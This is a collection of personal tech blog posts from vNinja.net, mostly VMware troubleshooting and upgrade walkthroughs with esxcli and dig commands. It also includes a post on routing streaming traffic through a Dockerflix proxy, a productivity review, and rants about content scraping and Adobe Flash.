Last year, in January, I posted 2015: Let’s DOS IT! and it’s time to do some reviewing (again, inspired by Scott Lowe). So, how did I do?
- **Master Markdown:** I’m happy to say that most of the writing I’ve done in 2015 has been done in Markdown. I haven’t really moved on to creating Markdown-based documentation and converting it like I intended, but still, Markdown has become second nature in 2015. Score: 7/10
- **Get more organised:** Now this one is easy. As mentioned in Todoist: One Year Later, I’ve completed 722 Todoist tasks in 2015, giving me a Todoist Master Karma level. Score: 10/10
- **Write better blog posts:** This one is hard to gauge, and to be honest it’s a really bad goal without any real metrics attached to it. I certainly didn’t increase my blogging frequency in 2015, but I did manage to put a few non-technical posts up on Medium. Score: 5/10
- **Get that VCAP-DCD certification:** Funnily enough, I did get my VCAP5-DCD certification. I didn’t get it in 2015 though; it turns out I actually got it in 2014 after all. For some reason VMware Education only informed me of this in January 2016. Why this happened, I have yet to find out, other than that there has to have been something wrong with the exam I took in 2014. Pretty bizarre, but at least I can cross that off the list as completed. Can’t give it a perfect 10 though; after all, I didn’t pass it in 2015. Score: 7/10
- **Redesign vNinja:** A bit of a cheat this one, as the redesign was mostly in the bag when the 2015 goals were written. I’m still not really happy with it, but it works. Score: 5/10

Overall Score: 34/50. I can absolutely live with that result, even though I wish the scores were a bit higher. Now I just need to write down a list for 2016 and publish that as well. To be sure I don’t forget, I’ve already put it into my Todoist task list, alongside the review task for 2016.
---
# Running Dockerflix on Ravello Systems
URL: https://vNinja.net/virtualization/running-dockerflix-on-ravello-systems/
Date: 2016-01-14
Author: christian
Tags: Docker, Dockerflix, Hipster IT, Ravello, VMware Photon

Dockerflix is a nice little project that allows you to route your Netflix (and various other streaming services) through an SNI proxy to access content that is otherwise geo-blocked. Of course, this requires that you have a VM with, for instance, a US IP to provide the breakout network, and that’s where Ravello Systems comes into the equation. Luckily, as a current vExpert, I have access to 1000 free monthly CPU hours of personal/lab usage, all with a choice of regions to put the VM in. Perfect. I created a VMware Photon-based VM on Ravello, with an Elastic IP that allows the IP to stick to the VM even if it’s moved to another public cloud, and installed Dockerflix. VMware Photon doesn’t come with docker-compose, which Dockerflix is dependent on; check Install Docker Compose for details on how to install it. Once that is installed, run the following command to download Dockerflix:

git clone https://github.com/trick77/dockerflix.git

Setup of Dockerflix itself is pretty straightforward, just follow the README provided by the project. Make sure you enable http/https/ssh to the VM with a public IP. Once that was done, I set up dnsmasq on one of the Linux VMs in my home lab, with the output config from the Python script provided by Dockerflix:

python ./gendns-conf.py --remoteip [RAVELLO_PUBLIC_IP]

Note: Running this permanently would be a violation of the Ravello vExpert Terms of Service. This is to be considered a technical Proof of Concept, more than a permanent setup. I haven’t investigated the possibility of setting up something like this permanently on either vCloud Air, AWS, Azure or Google Cloud Platform, or whether you are even allowed to do so.
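For reference, the config such a generator produces boils down to dnsmasq address overrides that resolve each streaming domain, and all its subdomains, to the proxy VM's public IP. A minimal sketch of the idea in Python - the function name and domain list are illustrative, not the actual gendns-conf.py:

```python
def dnsmasq_overrides(remote_ip, domains):
    """Build dnsmasq 'address' directives pointing each domain,
    including all of its subdomains, at the SNI proxy's public IP."""
    return "\n".join("address=/%s/%s" % (d, remote_ip) for d in domains)

# Illustrative domains only; the real list ships with the Dockerflix project
print(dnsmasq_overrides("203.0.113.10", ["netflix.com", "nflxvideo.net"]))
```

Point your clients at the dnsmasq instance serving this config, and only the listed domains take the detour through the breakout VM; everything else resolves normally.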
But then again, all you are doing is routing IP traffic… As far as testing goes, I experienced no problems with bandwidth or anything else. Streaming was perfect, and seamless. The fact that I was routing the traffic through a VM running in the US was not noticeable at all. Configuring it was a great exercise. Not only did I get to play with VMware Photon and Docker, but it also shows that using Ravello Systems to perform Proof of Concept scenarios is perfectly viable, even enjoyable.

---
# Todoist: One year later
URL: https://vNinja.net/workflow/todoist-one-year-later/
Date: 2016-01-06
Author: christian
Tags: Evernote, Productivity, Todoist

A little over a year ago I posted Combining Todoist and Evernote, because awesome, and I thought it was about time to post a follow-up now, one year later.

Evernote #
Firstly, my Evernote is still a giant mess, just as it was a year ago. I have lots of data in Evernote, but its main purpose is just storing quick notes on ongoing projects, and it serves as a basis for generating proper documentation. For that purpose it works really well, but I can’t seem to be able to actually use it for much beyond that. For me, Evernote is the equivalent of a shed: a place you put all your stuff, only to realize you never use it again. Since my original post, I’ve stopped my Todoist Task -> Evernote IFTTT recipe. After all, all it did was store even more unneeded stuff in my shed.

Todoist #
2015 was the first full year I’ve used Todoist as my primary task manager. 722 completed tasks later, and I couldn’t be happier with it. It’s easy to work with, very flexible, and doesn’t get in the way. I have the iOS app running on my phone, the desktop application running on OS X and the Outlook plugin running in my corporate VM. It helps me focus on the things I need to get done, and if I need to take notes or document things in relation to those tasks, I create Evernote notes for them manually.
I’ve tried several to-do task managers in the past, but Todoist is the first one that’s stuck with me. Plus, completing a task gives me Karma points. I like Karma, especially when it goes in my favor. Now, of course, I have to do some automation. Everything I tag with “reading” in Pocket gets added to my “To Read” project in Todoist. That provides me with a nice list of things I’ve been meaning to read later, all within the same interface as my daily tasks. Has it made me more productive? I don’t know. What I do know is this: it certainly makes it much harder to forget to do something, and that can’t be bad.

---
# YourDailyTech - Content Stealers
URL: https://vNinja.net/news/yourdailytech-content-stealers/
Date: 2015-12-03
Author: christian
Tags:

Yesterday I saw this tweet from Stephen Foskett:

Dear @YourDailyTechUS, You appear to rip off whole articles from a wide variety of sources. Is your business model based on plagiarism? — Stephen Foskett (@SFoskett) December 2, 2015

Which spurred a discussion back and forth, with a few rather interesting statements from yourdailytech.com, like this one:

@h0bbel @SFoskett Our goal is to provide our readers with relevant information and content writers with a wider audience. — YourDailyTech (@YourDailyTechUS) December 2, 2015

The problem is that they take original content from other sites, and republish it on their own. At first glance, you’ll see Angelica as the author, even if they claim that that’s not the intention. It just happens to be that user account that published the reproduced content, like this one: 5 Key Aspects for Safe Virtualization. The original author is mentioned in the article itself, in this case Camilo Gutierrez Amaya, published on www.welivesecurity.com. For all I know YourDailyTech has an official partnership with welivesecurity.com, but I don’t see any information about that on the site itself. So, what’s the problem? Well, in a nutshell, what yourdailytech.com is doing is copyright infringement.
Pure and simple. Just have a look at the very definition of copyright infringement (from Wikipedia):

Copyright infringement is the use of works protected by copyright law without permission, infringing certain exclusive rights granted to the copyright holder, such as the right to reproduce, distribute, display or perform the protected work, or to make derivative works.

By also adding their own ads on their “recycled” content, they are not only republishing content without permission, they are also monetizing it for their own benefit. Some of the original content owners have even paid for the content, only to have someone else republish it. Bad as this might be, the problems don’t stop there. Google punishes duplicate content, and in the worst cases it might even de-list sites that engage in it. So in YourDailyTech’s quest to connect “content writers with a wider audience”, they risk punishing the original content creators in the process. After yesterday’s discussion on Twitter, yourdailytech.com has published “an apology” called An Open Letter to Our Readers, and yet again, there are several problems:

“We are deeply sorry for any ill feelings we caused by posting articles from authors without their knowledge.” – So, they openly admit to copyright infringement, but only because they thought content creators would benefit from it. Why would anyone believe that?

“To be perfectly clear, we in no way monetized and/or profited from the hard work they put in to creating great content.” – So, the ads on the pages of your stolen content are there by accident?

“We have NEVER misled anyone into believing a YourDailyTech employee was the original author and never will.” – Well, if you have a look at http://yourdailytech.com/author/angelica/ it even mentions Angelica as the author right in the URL itself. I would call that misleading. The open letter is even signed by Philip Reid, but the author of the article is … Angelica.
The apology seems to have been written as a response to being caught, nothing else. I’m sorry, but there is no way to take a company (?) that behaves like this seriously. What YourDailyTech is doing is pure theft, and I urge anyone who finds their own content republished on that site to file a Cease and Desist order, file a DMCA request and publicly shame YourDailyTech. Note: As far as I know, none of my own content has been ripped this way. I just feel sorry for the people that YourDailyTech abuses in this manner.

Update #
If you want to check if your own content has been ripped, do a Google search for site:yourdailytech.com. Hat tip to Justin Warren for that suggestion.

---
# VMware VSAN - More than meets the eye.
URL: https://vNinja.net/virtualization/vmware-vsan-more-than-meets-the-eye/
Date: 2015-11-13
Author: christian
Tags: Future, Microvisor, VSAN, vSphere

Way back in 2014 I wrote a piece called VSAN – The Unspoken Future, and I think it’s about time it got a revision. Of course, lots of things have happened to VSAN since then and even more is on the way, but I think there is more to this than adding features like erasure coding, deduplication and compression. All of these are important features, and frankly they need to be, in a product that aims a lot higher than you might think. At the moment, VSAN provides storage internally to a vSphere cluster. If you want to use that storage in other ways, you either have to share it from a VM over the network or use NexentaConnect for VMware Virtual SAN. Yesterday, VMUG.it shared the following photo from Duncan Epping’s “Goodbye SAN Huggers, Hello Virtual SAN” session at their VMUG UserCon:

Look closely at that one for a minute. What are Duncan and VMware telling us here, if you squint your eyes and try to read between the lines? For me, this slide was a bit of a lightbulb moment: VMware wants to turn VSAN into a generic storage provider in the data center. You need some storage of some sort?
VSAN will provide it, even if your applications are not located on the same cluster. Object-based? Sure. Block? Sure. REST? Sure, that’s what the cool kids do. VMFS? Only if you need to run a VM. Couple this with the vSphere Integrated Containers and Photon Platform announcements, where VMware is already talking about the microvisor. So, remove the vSphere layer in the slide above, and replace it with a variant of the VSAN ROBO witness appliance of some sort, which runs just enough to provide policy-based storage services. Once you have those two bits talking to each other, you don’t need the traditional vSphere layer to provide hardware virtualization at all for those cloud-native apps. Add NSX to the mix, with network policies that follow the application, and you have a portable application infrastructure that can run pretty much anywhere you prefer. At VMworld 2015, VMware showed NSX for Multi-Hypervisor running on AWS, extending the network from on-premises to Amazon. Why not do the same with storage? Want cloud-based storage? Sure, add the little VSAN layer in front of your provider’s storage offering, and boom: instant policy management and portability. And of course, VMware will be there to provide you with the management and monitoring layer for all of this - even if you don’t run vSphere. VMware is getting ready for the post-virtualization, multi-platform world, no question about it. Are You Ready for Any?
---
# vCenter / SSO unable to retrieve AD-information | Error while extracting local SSO users
URL: https://vNinja.net/virtualization/vcenter-sso-unable-to-retrieve-ad-information-error-while-extracting-local-sso-users/
Date: 2015-11-10
Author:
Tags: 6.0, ESXi, SSO, vCenter, vSphere

After deploying a new VCSA 6.0u1, I was seeing some weird errors while trying to retrieve AD users/groups (or anything from the esod.local domain). After some serious head scratching, it dawned on me after checking the DNS records for the DC in the domain, from the vCenter Appliance itself:

dig +noall +answer +search dc1.esod.local
dc1.esod.local. 3600 IN A 10.0.1.201

So far so good, the DNS lookup works as expected.

dig +noall +answer +search -x 10.0.1.201

That’s right, the reverse lookup returns exactly zilch, zero, zippo, nil, nada and null.

The Solution #
Add a reverse lookup zone to DNS and update the DC PTR record. Once that is done, it works as expected:

dig +noall +answer +search -x 10.0.1.201
201.1.0.10.in-addr.arpa. 3600 IN PTR dc1.esod.local.

Re-checking the domain in the vCenter Web Client shows that AD information is retrieved correctly. It turns out that in vCenter 6.0u1, reverse PTR records are required for SSO and Active Directory authentication to function properly.

---
# Nordic VMUG UserCon Session
URL: https://vNinja.net/virtualization/nordic-vmug-usercon-session/
Date: 2015-10-28
Author: christian
Tags: Speaking, UserCon, VMUG

VMUG Denmark is arranging the Nordic VMUG UserCon in Copenhagen on December 1st 2015, and the agenda went live earlier today. I’m definitely going to be there, and as it turns out I even have my own session lined up:

Session Title: VCS to VCVA Converter, or how a fling can be good for you!
Session Abstract: Migrating from Windows vCenter to the VCVA? No worries, the VMware VCS to VCVA Converter fling has you covered! Learn how to migrate your existing configuration to the vCenter Virtual Appliance.
We’ll cover both best practices and caveats from real-world experiences with the tool! I hope to see all of you there, and perhaps some of you will even pop into my session. I’m certain that “Getting back to my roots – a look at vSphere Core Storage Enhancements! - Cormac Hogan, VMware” and “vRealize Orchestrator – The missing “Getting Started” session - Joerg Loew, VMware” will draw the biggest crowds in my time slot though (which is arguably a good thing). VMUG Denmark has really put together a great-looking agenda, with additional speakers like Paul Strong, Duncan Epping, Paudie O’Riordan and William Lam to mention a few. I’m also really looking forward to the closing keynote “The Cloud and Beyond” by Andreas Mogensen of the ESA. So, if you have the chance, book a trip to Copenhagen and let’s meet up for a beer at the closing reception at the Nordic VMUG UserCon. See you there!

---
# Relax and virtualize it!
URL: https://vNinja.net/virtualization/relax-and-virtualize-it/
Date: 2015-10-15
Author:
Tags:

This is a guest post from Kristian Wæraas, Senior Consultant Datacenter at Datametrix AS, VMware VCP3/5, MCTS Hyper-V, Horizon View and Trend Micro Security Expert.

I am curious by nature, and when my colleagues start talking frantically about some system that has crashed, I get curious and have to ask questions. Usually this ends up with me doing a lot of work. This, however, was not one of those times. A few weeks ago, one of my colleagues came in late after a long night trying to fix a reoccurring bluescreen on a critical customer database server. Looking quite drawn, he sat down, picked up his phone and called Microsoft Support. I have to admit that I did some eavesdropping on that conversation, as it contained a few interesting tidbits that aroused my curiosity:

- “Physical server” (We still use those?)
- “Database on FC SAN”
- “Critical data!” (Oh my!)

The minutes went by and turned into hours, and they were still trying to fix the server.
Diagnostics, rescue disks, rescue console, driver reinstalls, system file checking, fixing the MBR and so on – but the server refused to cooperate. At some point Microsoft gave up on fixing the server, and asked if we could just reinstall it, which in this case would take even more hours. When lunchtime came they had taken a break, and I started asking my colleague questions; not regarding the bluescreen and possible fixes, but more about the basic layout of the system. It turns out that it was an old physical server running Windows Server 2008 R2; it had an Oracle database installed, with the database files placed on a SAN, mounted directly into the server via FC - a normal setup for database servers, I guess. We had a little chat on possible solutions to the problem during lunch, and my colleague’s first thought was actually to find an identical physical server so he could install it in parallel to the faulty server, then physically move the fiber cable from the unstable server to the new one. I of course asked if we could virtualize the server instead. My colleague thought the idea was intriguing, but not knowing all the details of VMware’s possibilities, he had many questions: “How will it perform? How do we get the database files copied into the server? How long will it take to get a server ready? We need at least 2 CPUs and 8GB of RAM. Will there be cake?” I explained to him that performance-wise, the virtual server would do just fine, and that we could give it as many resources as it needed. As for getting a server up and running, I suggested using already prepared templates, which would take no more than a few seconds to deploy. Also, and this was my key point in this solution, the file copy is unnecessary: “You don’t have to copy the files from the SAN into the server; you can just do zoning on the FC switches, and directly attach the datastore as raw disks on the virtual server. The disks will then appear inside the OS as you are used to.” “Is all this possible? How do we do it?
If it is as easy as you say, this would save us hours of work!” Having done similar setups before, I was quite confident. However, “saving” a physical server with real critical data from humiliation by moving its datastore into a virtual server was new to me, so I did a quick tweet to my good friend Christian Mohn (vNinja extraordinaire) to run my theory by him. We both agreed that the theory was spot on, but neither of us had done this job before. Being wary of data loss, data corruption and the procedure as a whole, I agreed to do some tests to see if my theory was viable in our situation. We started with a basic SAN backup of the datastore, and then we did the necessary zoning by adding the backup LUN to the VMware host zone-group. After a quick rescan of datastores on the hosts, we saw the new LUNs available to the hosts. The next thing was to add a new disk on a test server, choose Raw Device Mapping (physical compatibility mode), and find the correct LUN ID. When all this was done, we logged into the test server, went into Disk Management and did a “Rescan Disks”. The disk appeared, drive letter and all. After verifying that the data was there, and that everything looked good, we felt confident that this approach worked, and we did the entire process again with the “live” data. I always get a satisfied feeling inside when I am able to help a colleague solve an annoying issue. In this case, my actual work took no time at all; I also managed to open the eyes of my colleague, who is now planning more P2V migrations. The customer was also happy, which in the end is what really matters. I think the moral of the story is that “knowledge is power”. If you know what different solutions/products are capable of, and you know how to use them correctly, you will be able to solve most problems quite quickly. And yes, there was cake!

---
# What if it's Just Some Crazy Guy in a Clown Suit?
URL: https://vNinja.net/news/what-if-its-just-some-crazy-guy-in-a-clown-suit/
Date: 2015-09-08
Author: christian
Tags: Changes, Cloud, EVRY, Work

As a few of you have noticed, I recently changed my title on LinkedIn from Chief Consultant to Cloud Architect in the newly formed EVRY Cloud Consulting division. But what does that mean, and perhaps more importantly, why? The closest description I have found for what my new role is, is this:

Leads in the development of the technical solution or offering, in translating the business needs into technical requirements. Identifies gaps, strategic impacts, financial impacts and the risk profile in the technical solution or offering, and provides technical support. [Joe McKendrick / Forbes](http://www.forbes.com/sites/joemckendrick/2013/01/28/5-skills-that-should-be-part-of-every-cloud-job-description/)

Or, as Mrs. Josh Atwell would say: This change comes with the realization that for most SMB customers, moving IT services to cloud-based solutions makes a lot of sense. No, this doesn’t mean I’m abandoning virtualization. I still have a passion for running efficient data centers, but only when it makes sense to do so - and often it does not - but when it does, I sure want to be there and help build it. IT means that I will need to broaden my horizons and see a larger picture. IT means I will have to learn something new. IT means I will be challenged in a whole new way going forward. IT means change. IT is changing. IT is happening. IT means less product, more business needs. The time of IT for IT’s own sake has passed, and I feel fine.

---
# VMware Update Manager: Unsupported Configuration
URL: https://vNinja.net/vmware-2/vmware-update-manager-unsupported-configuration/
Date: 2015-08-28
Author: christian
Tags: ESXi, NFS, Upgrade, vCenter, Veeam Backup & Replication, VMware

During an upgrade from vSphere 5.1 to 5.5, I ran into a rather strange issue when trying to utilize VMware Update Manager to perform the ESXi upgrade.
During scanning, VUM reported the ESXi host as “Incompatible”, without offering any other explanation. I spent ages looking through the VUM logs trying to find the culprit, suspecting it was an incompatible VIB. Without finding anything that gave me any indication of what the problem might be, I moved on to looking at the ESXi image I had imported into VUM. As this was on a Dell PowerEdge R710, I was utilizing the Dell Customized Image of VMware ESXi 5.5 Update 2, which got an updated A02 version last night (27th of August) - I downloaded my image, VMware-VMvisor-Installer-5.5.0.update02-2068190.x86_64-Dell_Customized-A00.iso, on the 27th, but before the VMware-VMvisor-Installer-5.5.0.update02-2068190.x86_64-Dell_Customized-A02.iso image was available. Thinking this would resolve the issue, I imported the new image into VUM, and created a new Upgrade Baseline. Sadly, I was still greeted by the non-gracious “Incompatible” warning after performing a new scan. After some more digging, I found the following entry in the Events pane for the given host in vCenter:

Error in ESX configuration file (esx.conf). error 28.08.2015 11:51:25 Scan entity [hostname] [username]

Naturally, I went digging into the /etc/vmware/esx.conf file, and found the following entries:

/nas/[oldserver]/readOnly = "false"
/nas/[oldserver]/enabled = "true"
/nas/[oldserver]/host = "[oldserver.fqdn]"
/nas/[oldserver]/share = "/VeeamBackup_[oldserver]/"

These references to [oldserver] pointed to an old Veeam Backup & Replication server that was decommissioned ages ago. Veeam B&R adds these entries to a host if vPowerNFS has been used to mount a backup share, and the entries had not been removed when the old Veeam B&R server was retired. DNS resolution for the old server failed, as it had been completely removed from the infrastructure, causing the VUM scan to fail. Manually removing these lines from /etc/vmware/esx.conf fixed the problem, and VUM was able to scan and remediate without issues.
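A quick way to spot leftovers like this before VUM chokes on them is to scan esx.conf for /nas/ entries and flag any whose host is no longer known to DNS. A small sketch of the idea (the parsing is simplified to the key = "value" format shown above, and the hostnames are illustrative):

```python
import re

def stale_nas_mounts(esx_conf, resolvable_hosts):
    """Return the names of /nas/ mounts whose 'host' value is not in
    the set of hosts that still resolve in DNS."""
    stale = set()
    for name, host in re.findall(r'/nas/([^/]+)/host = "([^"]+)"', esx_conf):
        if host not in resolvable_hosts:
            stale.add(name)
    return stale

# Entries modeled on the ones from this post, with illustrative names
conf = '''
/nas/oldserver/readOnly = "false"
/nas/oldserver/enabled = "true"
/nas/oldserver/host = "oldserver.example.local"
/nas/oldserver/share = "/VeeamBackup_oldserver/"
'''
print(stale_nas_mounts(conf, resolvable_hosts={"nfs01.example.local"}))  # → {'oldserver'}
```

On a live host, esxcli storage nfs list shows the same mounts, and esxcli storage nfs remove -v <name> drops a stale one without hand-editing esx.conf.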
Update #

After writing this, I saw Jim Jones had the same experience; for more details, read his post: Unsupported Configuration when using VUM for a Major Upgrade

---

# Update ESXi Embedded Host Client Fling

URL: https://vNinja.net/vmware-2/update-esxi-embedded-host-client-fling/ Date: 2015-08-26 Author: christian Tags: Embedded Host Client, ESXi, vSphere

The ESXi Embedded Host Client Fling got an upgrade today, and in addition to new features it now works properly on ESXi 5.5. It is also available as an offline bundle, so you can distribute it with Update Manager. Since I've spent most of my day in esxcli, here is a quick post on how to perform the upgrade from a local http repository hosting the .vib file.

Install .vib file #

Download the esxui-3015331.vib file and place it somewhere accessible via http. SSH to your ESXi host, and run the following command (remember to enable maintenance mode if needed):

```
esxcli software vib install -v http://[yourip:port/path]/esxui-3015331.vib
```

Wait for the installation to finish:

```
Installation Result
   Message: Operation finished successfully.
   Reboot Required: false
   VIBs Installed: VMware_bootbank_esx-ui_0.0.2-0.1.3015331
   VIBs Removed: VMware_bootbank_esx-ui_0.0.2-0.1.2976804
   VIBs Skipped:
```

Access the updated Embedded Host Client via http://hostip/ui/

---

# ESXi5.5 to 6.0 Upgrade From Local HTTP Daemon

URL: https://vNinja.net/vmware-2/esxi5-5-to-6-0-upgrade-from-local-http-daemon/ Date: 2015-08-26 Author: christian Tags: ESXi, vCenter, VMware, vSphere

I was recently involved with consulting for a Norwegian shipping company that has quite a few remote vSphere installations, most of them with a couple of ESXi hosts, but no vCenter and hence no Update Manager.
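For setups like these, a quick way to stage patches centrally is a small http daemon. A minimal proof-of-concept sketch using Python's built-in http server (Python 3.7+; the directory and port are illustrative, and anything permanent deserves a proper web server):

```python
# Proof-of-concept http daemon for serving files (e.g. an extracted ESXi
# offline bundle) from a directory. Illustrative sketch only.
from functools import partial
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer

def serve_directory(directory, port=8000):
    """Return an http server rooted at `directory`; call serve_forever() to run it."""
    handler = partial(SimpleHTTPRequestHandler, directory=directory)
    return ThreadingHTTPServer(("0.0.0.0", port), handler)
```

Point it at the directory holding your bundle and call serve_forever(), and hosts on the network can fetch the files over plain http from http://daemon-ip:8000/.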
While looking at methods for managing these installations, in particular how to facilitate patching and upgrading scenarios, I remembered that way back in 2013 I posted Quick and Dirty HTTP-based Deployment, which shows how to use Python to run a simple http daemon and serve files from it. Surely something similar can be used to maintain a central repository for vSphere patches? While I don't recommend using your MacBook as a permanent source for these updates - you really should set up a proper http server in your network and utilize that - it works as a proof of concept. So here it is, a recipe for using a simple http daemon to host your own ESXi Offline Bundles, and how to upgrade from 5.5 to 6.0 from the command line.

Download the offline bundle you want to use; in my case I used ESXi600-201507001.zip (ESXi 6.0.0b). Extract the .zip file into its own directory, served by the http daemon, and rename it for simplicity.

Connect to your target ESXi host via SSH, and check the current running ESXi version by running esxcli system version get:

```
The time and date of this login have been sent to the system logs.
VMware offers supported, powerful system administration tools. Please see www.vmware.com/go/sysadmintools for details.
The ESXi Shell can be disabled by an administrative user. See the vSphere Security documentation for more information.
~ # esxcli system version get
   Product: VMware ESXi
   Version: 5.5.0
   Build: Releasebuild-1623387
   Update: 1
~ #
```

Enable outgoing http requests from the ESXi host by running esxcli network firewall ruleset set -e true -r httpClient

Determine which profile to use by running esxcli software sources profile list -d [http://daemon-ip:port/directory/]:

```
~ # esxcli software sources profile list -d http://172.29.100.248:8000/6.0/
Name                              Vendor        Acceptance Level
--------------------------------  ------------  ----------------
ESXi-6.0.0-20150701001s-standard  VMware, Inc.  PartnerSupported
ESXi-6.0.0-20150701001s-no-tools  VMware, Inc.  PartnerSupported
ESXi-6.0.0-20150704001-no-tools   VMware, Inc.  PartnerSupported
ESXi-6.0.0-20150704001-standard   VMware, Inc.  PartnerSupported
~ #
```

Run vim-cmd hostsvc/maintenance_mode_enter to put the ESXi host into maintenance mode.

Run esxcli software profile update -d [http://daemon-ip:port/directory/] -p [profilename] to fetch and install from the http daemon:

```
~ # esxcli software profile update -d http://172.29.100.248:8000/6.0/ -p ESXi-6.0.0-20150704001-standard
Update Result
   Message: The update completed successfully, but the system needs to be rebooted for the changes to be effective.
   Reboot Required: true
   VIBs Installed: [long list of vibs removed for brevity]
   VIBs Skipped:
~ #
```

Disable outgoing http client traffic by running esxcli network firewall ruleset set -e false -r httpClient, and reboot the host by running the reboot command. When the host has rebooted, connect to the ESXi host again via SSH and run esxcli system version get:

```
[root@localhost:~] esxcli system version get
   Product: VMware ESXi
   Version: 6.0.0
   Build: Releasebuild-2809209
   Update: 0
   Patch: 11
[root@localhost:~]
```

Verify that it runs the correct version, and run vim-cmd hostsvc/maintenance_mode_exit to take the host out of maintenance mode.

And that's it: the host has now been upgraded from ESXi 5.5 to 6.0, from a local centralized http-based repository, without the need to connect to the outside world. All done via the command line, and without a vCenter with Update Manager. Pretty neat.

---

# HP Proliant DL380p Gen8 "Decompressed MD5" error

URL: https://vNinja.net/virtualization/hp-proliant-dl380p-gen8-decompressed-md5-error/ Date: 2015-08-13 Author: Tags:

This is a guest post from Shane Williford, Sr. Systems Engineer, VCAP-DCA/EMCCAe/Pizza Connoisseur and vExpert.

Problem History #

I work at a school district in the US (Kansas City area). After the school year ended, my Director decided he wanted to upgrade to vSphere6 from vSphere55U2 on a few Hosts we were using with XenApp.
We are using XenApp to deliver apps to student labs that utilize an Autocad program. As such, our Hosts also have a graphics card in them – nVIDIA GRID K1. To give the students a bit more graphics power this upcoming school year, we added a 2nd nVIDIA card to each Host. The Hosts are HP Proliant DL380p Gen8 with Intel Xeon X5650 2.67GHz processors and about 296GB RAM. Since we added a 2nd nVIDIA card, we also needed to upgrade the Host power supplies to support the 2 cards' power consumption (1200W support). In addition, we only had one 2-port Fiber Adapter in each Host, and we wanted to add another for redundancy. The Adapter model used is HP FlexFabric 10Gb 2-port 554FLR-SFP Adapter.

Upon booting the Host after adding both the 2nd Adapter and the 2nd nVIDIA card, I experienced two issues. Before the POST, an RSOD (red screen of death) displayed stating "NMI Detected. Consult Integrated Management log for details", and then, after I resolved that error and attempted the vSphere6 install, I received the Decompressed MD5 error. When I reviewed the iLO log for the RSOD NMI error, I saw recurring messages pointing at the new hardware. After many attempts searching the "interwebz" for a resolution to both issues, and having no luck, it was time to ping HP Support. After several correspondences with HP and attempting different configs, below is what was done to finally resolve each issue. I thought it would be worthwhile to share this with the community since 1) I found little to no posts on either issue in my resolution research, and 2) if anyone is using graphics cards to deliver visually-enhanced desktops as we are, this may prove beneficial and expedite any Host troubleshooting due to adding the aforementioned hardware.

Resolution #

NMI Error: The cause of the 1st issue wasn't too difficult to figure out, but the resolution was a bit cumbersome to pin down.
The issue was caused by adding the 2nd Adapter in the 2nd riser card that also housed the 2nd nVIDIA card, as noted in the iLO log. To mitigate the NMI error, a BIOS setting needed to be changed:

1. Enter the Setup Utility by pressing F9 during POST.
2. Arrow down to the 2nd option - Power Management Options, then press ENTER.
3. Arrow down to Advanced Power Management Options, then press ENTER.
4. Arrow down to Maximum PCI Express Speed and press ENTER to change the setting.
5. Press ESC out of the Advanced Power Management Options window, ESC out of the Power Management Options window, then ESC again to exit out of the Setup Utility.
6. When prompted, press F10 to Save and Exit the Utility and reboot the Host.

Decompressed MD5: After I resolved the NMI error, I attempted to install vSphere6. After the Host detected the vSphere package, I selected to install it and it began to unpack it. Towards the end of the unpack phase, the Decompressed MD5 error displayed. To resolve this error, I did the following:

1. I upgraded my BIOS to the latest version. As of the date of this post (12 Aug 15), the latest BIOS firmware release is dated 2 Aug 2014 (A), meaning it was 'amended' (13 Oct 2014); see this link: http://h20564.www2.hpe.com/hpsc/swd/public/detail?dwf.restartSession=true&sp4ts.oid=5194969&swItemId=MTX_e8d0275c17494b81b03e42bb3d&swEnvOid=4166#tab5
2. Press F9 to get into the main Setup Utility window (see the Setup Utility image posted above).
3. At the main Setup Utility window, press CTRL+A, which will then add Service Options at the end of the list.
4. Arrow down to Service Options and press ENTER; when in Service Options, arrow down to PCI Express 64-bit BAR Support. If this option is not set to Enabled, press ENTER and set it to Enabled.
5. Press ESC out of the Service Options window, then ESC again to exit out of the Setup Utility. When prompted, press F10 to Save and Exit the Utility.
6. After the Host reboots, re-attempt to install ESXi.
The Decompressed MD5 error should not display any longer.

---

# ESXi Embedded Host Client

URL: https://vNinja.net/vmware-2/esxi-embedded-host-client/ Date: 2015-08-12 Author: christian Tags: Awesome, VMware, vSphere, Web Client

I almost choked on my coffee this morning when I saw William Lam announcing a new VMware Fling called ESXi Embedded Host Client. Finally, the day when we can get a local vSphere Web Client on a standalone host is here, and it's not a moment too soon. This feature has been missing since ESX 3 and its VMware Infrastructure Web Access. For now, this is a Fling (which means unsupported and so on), but I really hope that this ends up being built in to ESXi very soon – even on the free vSphere Hypervisor. So, what does it look like? Well, to be honest it looks pretty darn awesome, and you know what? No Flash! Yes, it's HTML5 baby! If you are running ESXi 6, installation is as easy as installing a .vib (in ESXi 5.5 there is a workaround to get it running, highlighted in William's post). So, give it a spin and make sure to provide feedback on the Flings site to help ensure VMware sees that we as users of their products want this feature to be core to vSphere in upcoming releases. Make your voice heard, and make sure the team behind this gets the credit they deserve.

---

# Veeam Vanguard 2015

URL: https://vNinja.net/virtualization/veeam-vanguard-2015/ Date: 2015-07-27 Author: christian Tags: Award, Vanguards, Veeam

Veeam has been "silently" working on their own global influencer program, and the inaugural list of Veeam Vanguards was published today. I am thrilled to be selected amongst the first 31 people awarded this title - it's quite an exclusive list! So what's up with the name? Well, here is one of the definitions of vanguard I found:

vanguard /ˈvanɡɑːd/ noun: a group of people leading the way in new developments or ideas.

Sounds rather fitting if you ask me, at least if that's the rationale behind it.
One other definition I found was "the foremost part of an advancing army or naval force", which does sound kind of scary. Anyhow, I'm glad to be considered, and even more happy that I was selected among the first batch. For more details, read Veeam's announcement, or have a look at the Veeam Vanguard Program profile page (Warning, link does contain pictures).

---

# It's Time to End the Add on Insanity

URL: https://vNinja.net/rant/time-add-insanity/ Date: 2015-07-13 Author: christian Tags: Adobe, Flash, Rant, Security

For the third time in a week, researchers have discovered a zero-day vulnerability in Adobe's Flash Player browser plugin. Like the previous two discoveries, this one came to light only after hackers dumped online huge troves of documents stolen from Hacking Team — an Italian security firm that sells software exploits to governments around the world.

This quote is from Brian Krebs' post "Third Hacking Team Flash Zero-Day Found", who very rightfully goes on to advise that everyone "please consider removing or at least hobbling this program." Now, that is fine for the most part. I mean, who really needs Adobe Flash these days? Don't most services we use have other methods of handing us the content we want? The Apple iPhone doesn't have Adobe Flash, so why do we need it on our laptops? The fact is that most end users probably don't need to have Adobe Flash installed any more, but a lot of us sysadmins do. Why? Well, in my world one major culprit is the VMware vSphere Web Client. The Web Client has gotten its fair share of ill-repute over the last few years, but the latest edition in vSphere 6 is pretty responsive and quite pleasant to use. That's until you contemplate that it still needs Adobe Flash installed on the client. The same goes for any other admin interface that requires Adobe Flash, or even Java for that matter.
